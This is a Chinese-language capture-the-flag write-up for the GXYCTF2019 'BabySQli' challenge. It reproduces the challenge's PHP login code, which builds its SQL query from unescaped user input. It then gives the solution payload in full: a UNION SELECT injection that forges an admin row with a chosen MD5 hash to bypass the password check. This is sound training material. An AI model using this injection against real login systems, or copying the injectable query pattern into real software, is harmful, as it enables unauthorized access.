[GXYCTF2019]BabySQli

源码发现search.php，源码中发现字符，先base32解码，再base64解码

select * from user where username = '$name'

查看题目开源的源码

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";
 
// 去除转义
if (get_magic_quotes_gpc()) {
    function stripslashes_deep($value)
    {
        $value = is_array($value) ?
        array_map('stripslashes_deep', $value) :
        stripslashes($value);
        return $value;
    }
 
    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
 
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
$result = mysqli_query($con, $sql);
 
if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        $arr = mysqli_fetch_row($result);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}
?>

password有被MD5进行加密，查询出来的passwd和输入的密码的md5值比较，相等则登录得到flag不相等则wrong pass。

在联合查询并不存在的数据时，联合查询就会构造一个 虚拟的数据，可以利用联合查询来创建一行admin账户的续集数据，混淆admin用户的密码，将我们自定义的admin用户的密码（123）加进去。

在用户名登录框输入1' union select 1,'admin','202cb962ac59075b964b07152d234b70'

其中202cb962ac59075b964b07152d234b70为123的MD5值，然后在密码登录框中输入123即可登录。